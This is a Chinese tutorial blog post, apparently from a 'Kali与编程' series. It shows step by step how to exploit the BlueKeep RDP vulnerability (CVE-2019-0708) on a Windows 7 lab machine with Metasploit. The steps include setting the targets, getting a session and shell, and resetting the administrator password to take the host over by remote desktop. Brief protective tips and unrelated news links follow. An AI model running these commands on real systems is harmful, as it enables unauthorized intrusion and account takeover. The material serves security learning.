课前声明：
本分享仅做学习交流 ， 请自觉遵守法律法规！搜索：Kali与编程 ， 学习更多网络攻防干货！下篇文章将在明天下午五点发布 ， 敬请关注！
文章插图
二、战略安排
2.1 打开Metasploit渗透框架 ， 如下如所示 。
命令：msfconsole
文章插图
2.2 检索有关远程桌面的已知漏洞 ， 如下图所示 。
命令：search 0708
文章插图
2.3 使用检索到的关于远程桌面的漏洞利用模块 ， 如下图所示 。
命令：use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
文章插图
2.4 查看攻击目标需要设置的参数 ， 如下图所示 。
命令：show targets
文章插图
2.5 设置相关攻击参数 ， 如下图所示 。
命令：set rhosts 192.168.0.106
set lhost 192.168.0.102
set target 4
文章插图
文章插图
2.6 执行漏洞攻击模块 ， 如下图所示 。
命令：run
文章插图
文章插图
2.7 利用建立起来的会话查看受害者主机系统的相关信息 ， 如下图所示 。
命令：sysinfo
文章插图
2.8 利用建立起来的会话查看受害者主机系统的相关信息 ， 如下图所示 。
命令：ipconfig
文章插图
2.9 查看会话命令帮助信息 ， 如下图所示 。
命令：?
文章插图
【白帽子黑客带你：远程桌面漏洞利用与Win7计算机攻防实战下集】2.10 进入受害者主机cmd界面并解决乱码问题 ， 如下图所示 。
命令：shell
chnp 65001
文章插图
2.11 利用“whoami”命令查看相关信息 ， 如下图所示 。
命令;whoami
文章插图
2.12 利用cmd命令在受害者主机创建一个新用户 ， 如下图所示 。
命令：net user administrator 123456
文章插图
2.13 利用图形化远程桌面登录工具登录受害者主机 ， 如下图所示 。
文章插图
文章插图
文章插图
2.14 成功利用图形化远程登录工具拿下目标主机 ， 如下图所示 。
文章插图
2.15 远程桌面漏洞防护措施 ， 如下图所示（关闭远程桌面登录服务、开启防火墙、安装第三方电脑管家等等） 。
文章插图
文章插图
文章插图
文章插图
文章插图
PS：到此学习完毕 ， 谢谢观看 ， 获取更多干货请持续关注本号！
文章插图
原创不易 ， 各位看官记得好评加关注哦！你也可点击了解更多 ， 或搜索：Kali与编程 ， 学习更多Kali Linux渗透与白帽编程技巧哦！
文章插图

• 显卡|?灵耀Pro14 流星白惊艳登场， RTX 30系显卡的14寸轻薄本，赚翻！
• 显示器|鲜花卖出白菜价！生鲜巨头杀入鲜花赛道！
• iPhone|800亿没白出，台积电3nm芯片被确认，iPhone14配置良心有加
• 腾讯云|白银市政府与腾讯云达成战略合作
• 联想|绷不住了！昔日虚空游戏本R9000P现货还便宜了，白色版降价更快
• MIUI|iPhone手机不会用等于白买！这5个隐藏冷知识，小技巧但有大用处
• 相机|打破垄断，国产全画幅CMOS问世，国产相机空白的历史或将改写？
• 小钢炮|职场女性的颜值小钢炮轻薄本，灵耀Pro14 流星白催爆开售
• iPad|又想白嫖又骂娘，这些用户太难带！
• nova|年轻人对手机的需求，都被这款新品安排得明明白白